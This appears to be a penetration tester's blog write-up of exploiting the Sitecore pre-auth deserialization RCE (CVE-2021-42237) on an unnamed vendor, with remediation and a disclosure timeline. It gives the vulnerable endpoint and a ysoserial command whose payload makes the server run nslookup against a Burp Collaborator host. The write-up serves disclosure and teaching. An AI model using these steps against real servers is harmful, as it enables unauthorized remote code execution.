How I Get Pre-Auth Remote Code Execution (CVE-2021–42237) on One of the Vendors.

SITECORE Pre-Auth Remote Code Execution

Hi!!!, In this Article I would like to tell you a little about how I accidentally discovered the “Pre-Auth Remote Code Execution (CVE-2021–42237)” Attack on one of the Vendors affected by this attack.

Note : I will Censor any Vendor affected by this attack.

Description

Sitecore XP 7.5 Initial Release to Sitecore XP 8.2 Update-7 is vulnerable to an insecure deserialization attack where it is possible to achieve Remote Command Execution on the machine. No authentication or special configuration is required to exploit this vulnerability.

(https://nvd.nist.gov/vuln/detail/CVE-2021-42237)

Reconnaissance

First of all I get the login page from “Sitecore”

And I found out about the Version used on this Sitecore by going to the page “/sitecore/shell/sitecore.version.xml”

(https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB0891209)

Sitecore Version 8.2 (Vuln)

After I got this Version of Sitecore I continued to look for Vulnerabilities that impacted this 8.2 version.

Versions affected
Vulnerability SC2021–003–499266 affects the following Sitecore XP versions:
Sitecore XP 7.5 Initial Release — Sitecore XP 7.5 Update-2
Sitecore XP 8.0 Initial Release — Sitecore XP 8.0 Update-7
Sitecore XP 8.1 Initial Release — Sitecore XP 8.1 Update-3
Sitecore XP 8.2 Initial Release — Sitecore XP 8.2 Update-7

Exploitation

After I got the Vulnerable Version and Vulnerability Type I proceeded to try to exploit this vulnerable Website.
For more details regarding this attack you can see it here :
(https://blog.assetnote.io/2021/11/02/sitecore-rce/)

1) I opened the page (/sitecore/shell/ClientBin/Reporting/Report.ashx) and Intercepted my Burpsuite and changed Request from GET to POST

2) And I also added simple XML which will be useful for triggering RCE

3) Use “ysoserial” to generate a serial payload that will lead to Remote Code Execution (RCE)

nslookup is a network administration command line tool to query the Domain Name System for mappings between domain names and IP addresses, or other DNS records.

(./ysoserial.exe -f NetDataContractSerializer -g TypeConfuseDelegate -c “nslookup URL.burpcollaborator.net” -o base64 -t)
“NetDataContractSerializer” Inherently vulnerable to Command Execution.

Base64 Decode

4) After you create Payload RCE using Ysoserial now Decode it base64 and put it in “<parameter name=””>” section

5) And when you run this Payload you will get DNS Response on your Burpcollaborator.

Remediation

In order to fix this vulnerability:
For Sitecore XP 8.0.0 — Sitecore XP 8.2.7, remove the Report.ashx file from /sitecore/shell/ClientBin/Reporting/Report.ashx from all your server instances.

Note: The Report.ashx file is no longer used and can safely be removed.

Timeline

1. 1 July 2022 > I sent a report to them
2. 3 July 2022 > They managed to fix this attack, by deleting the files “Report.ashx” in (/sitecore/shell/ClientBin/Reporting/Report.ashx)

NICE~

Reference

NVD

%kb_name - %short_descr - Knowledge Portal

Sitecore Experience Platform Pre-Auth RCE - CVE-2021-42237

Follow Me

Caesar Evan Santoso - Penetration Tester - Q2 Technologies | LinkedIn

Thankssss All!!!